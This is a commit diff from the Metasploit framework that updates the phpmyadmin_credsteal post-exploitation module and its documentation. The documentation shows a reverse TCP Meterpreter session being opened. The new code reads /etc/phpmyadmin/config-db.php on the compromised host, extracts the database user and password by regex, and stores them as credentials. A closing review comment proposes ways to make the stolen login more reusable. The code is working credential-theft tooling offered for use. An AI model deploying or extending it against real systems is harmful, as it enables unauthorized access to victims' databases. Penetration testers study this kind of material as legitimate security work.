Land #10598, Store Credentials Found with PhpMyAdmin Password Extractor
parent
3e801c22fb
commit
5861087061
|
@ -15,36 +15,34 @@ This post module gathers PhpMyAdmin Creds from target Linux machine.
|
||||||
## Scenarios
|
## Scenarios
|
||||||
|
|
||||||
```
|
```
|
||||||
msf exploit(multi/handler) > [*] Sending stage (857352 bytes) to 127.0.0.1
|
msf5 > use multi/handler
|
||||||
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:46066) at 2018-08-18 14:46:52 -0400
|
msf5 exploit(multi/handler) > set lhost 192.168.37.1
|
||||||
|
lhost => 192.168.37.1
|
||||||
|
msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
|
||||||
|
payload => linux/x64/meterpreter/reverse_tcp
|
||||||
|
msf5 exploit(multi/handler) > run
|
||||||
|
|
||||||
msf exploit(multi/handler) > use post/linux/gather/phpmyadmin_credsteal
|
[*] Started reverse TCP handler on 192.168.37.1:4444
|
||||||
msf post(linux/gather/phpmyadmin_credsteal) > set SESSION 1
|
[*] Sending stage (816260 bytes) to 192.168.37.226
|
||||||
SESSION => 1
|
[*] Meterpreter session 2 opened (192.168.37.1:4444 -> 192.168.37.226:34880) at 2018-09-06 08:49:52 -0500
|
||||||
msf post(linux/gather/phpmyadmin_credsteal) > exploit
|
|
||||||
|
meterpreter > background
|
||||||
|
[*] Backgrounding session 2...
|
||||||
|
msf5 exploit(multi/handler) > use post/linux/gather/phpmyadmin_credsteal
|
||||||
|
msf5 post(linux/gather/phpmyadmin_credsteal) > set session 2
|
||||||
|
session => 2
|
||||||
|
msf5 post(linux/gather/phpmyadmin_credsteal) > run
|
||||||
|
|
||||||
|
|
||||||
|
PhpMyAdmin Creds Stealer!
|
||||||
|
|
||||||
[+] PhpMyAdmin config found!
|
[+] PhpMyAdmin config found!
|
||||||
[+] Extracting config file!
|
[+] Extracting creds
|
||||||
|
[+] User: admin
|
||||||
<?php
|
[+] Password: acoolpassword
|
||||||
##
|
[*] Storing credentials...
|
||||||
## database access settings in php format
|
[+] Config file located at /Users/space/.msf4/loot/20180907081056_default_192.168.37.226_phpmyadmin_conf_580315.txt
|
||||||
## automatically generated from /etc/dbconfig-common/phpmyadmin.conf
|
|
||||||
## by /usr/sbin/dbconfig-generate-include
|
|
||||||
##
|
|
||||||
## by default this file is managed via ucf, so you shouldn't have to
|
|
||||||
## worry about manual changes being silently discarded. *however*,
|
|
||||||
## you'll probably also want to edit the configuration file mentioned
|
|
||||||
## above too.
|
|
||||||
##
|
|
||||||
$dbuser='phpmyadmin';
|
|
||||||
$dbpass='Passw0rd';
|
|
||||||
$basepath='';
|
|
||||||
$dbname='phpmyadmin';
|
|
||||||
$dbserver='localhost';
|
|
||||||
$dbport='3306';
|
|
||||||
$dbtype='mysql';
|
|
||||||
|
|
||||||
[*] Post module execution completed
|
[*] Post module execution completed
|
||||||
msf post(linux/gather/phpmyadmin_credsteal) >
|
msf5 post(linux/gather/phpmyadmin_credsteal) >
|
||||||
|
|
||||||
```
|
```
|
||||||
|
|
|
@ -25,32 +25,47 @@ class MetasploitModule < Msf::Post
|
||||||
))
|
))
|
||||||
end
|
end
|
||||||
|
|
||||||
def run
|
def parse_creds(contents)
|
||||||
|
db_user = contents.scan(/\$dbuser\s*=\s*['"](.*)['"];/).flatten.first
|
||||||
|
db_pass = contents.scan(/\$dbpass\s*=\s*['"](.*)['"];/).flatten.first
|
||||||
|
|
||||||
|
unless db_user && db_pass
|
||||||
|
print_error("Couldn't find PhpMyAdmin credentials")
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
|
print_good("User: #{db_user}")
|
||||||
|
print_good("Password: #{db_pass}")
|
||||||
|
|
||||||
|
print_status("Storing credentials...")
|
||||||
|
store_valid_credential(user: db_user, private: db_pass)
|
||||||
|
end
|
||||||
|
|
||||||
|
def run
|
||||||
print_line("\nPhpMyAdmin Creds Stealer!\n")
|
print_line("\nPhpMyAdmin Creds Stealer!\n")
|
||||||
cred_dump = ""
|
|
||||||
|
|
||||||
if session.platform.include?("windows")
|
if session.platform.include?("windows")
|
||||||
print_error("This module is not compatible with windows")
|
print_error("This module is not compatible with windows")
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
|
|
||||||
conf_path= "/etc/phpmyadmin/config-db.php"
|
conf_path = "/etc/phpmyadmin/config-db.php"
|
||||||
unless file_exist?(conf_path)
|
unless file_exist?(conf_path)
|
||||||
print_error("#{conf_path} doesn't exist on target")
|
print_error("#{conf_path} doesn't exist on target")
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
|
|
||||||
print_good('PhpMyAdmin config found!')
|
print_good('PhpMyAdmin config found!')
|
||||||
print_good("Extracting Creds")
|
|
||||||
res = read_file(conf_path)
|
res = read_file(conf_path)
|
||||||
unless res
|
unless res
|
||||||
print_error("You may not have permissions to read the file.")
|
print_error("You may not have permissions to read the file.")
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
|
|
||||||
cred_dump << res
|
print_good("Extracting creds")
|
||||||
p = store_loot('phpmyadmin_conf', 'text/plain', session, cred_dump, 'phpmyadmin_conf.txt', 'phpmyadmin_conf')
|
parse_creds(res)
|
||||||
print_good("Credentials saved in #{p}")
|
|
||||||
|
p = store_loot('phpmyadmin_conf', 'text/plain', session, res, 'phpmyadmin_conf.txt', 'phpmyadmin_conf')
|
||||||
|
print_good("Config file located at #{p}")
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
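Review bot: The two captures in `parse_creds` use a greedy `(.*)` between unpaired quote classes, so a value that contains a quote, or a line with a second quoted token after the `;`, is captured with extra characters, and a backslash-escaped quote as PHP writes it in a single-quoted string would be stored verbatim. Pairing the opening quote with a backreference and a non-greedy capture narrows the match, e.g. `db_user = contents[/\$dbuser\s*=\s*(['"])(.*?)\1\s*;/, 2]` and `db_pass = contents[/\$dbpass\s*=\s*(['"])(.*?)\1\s*;/, 2]`, which also drops the `scan(...).flatten.first` chain; unescaping `\'` and `\\` before the credential is stored is worth a follow-up if the generated file is confirmed to escape them. The same config carries `$dbserver` and `$dbport` (visible in the documentation output in this commit) that the `store_valid_credential(user:, private:)` call does not record, so the stored login has no service attached; if that helper accepts service data in this tree, passing the parsed host and port would make the entry usable by other modules. `parse_creds` and `run` belong to `MetasploitModule`, whose class header starts before this hunk.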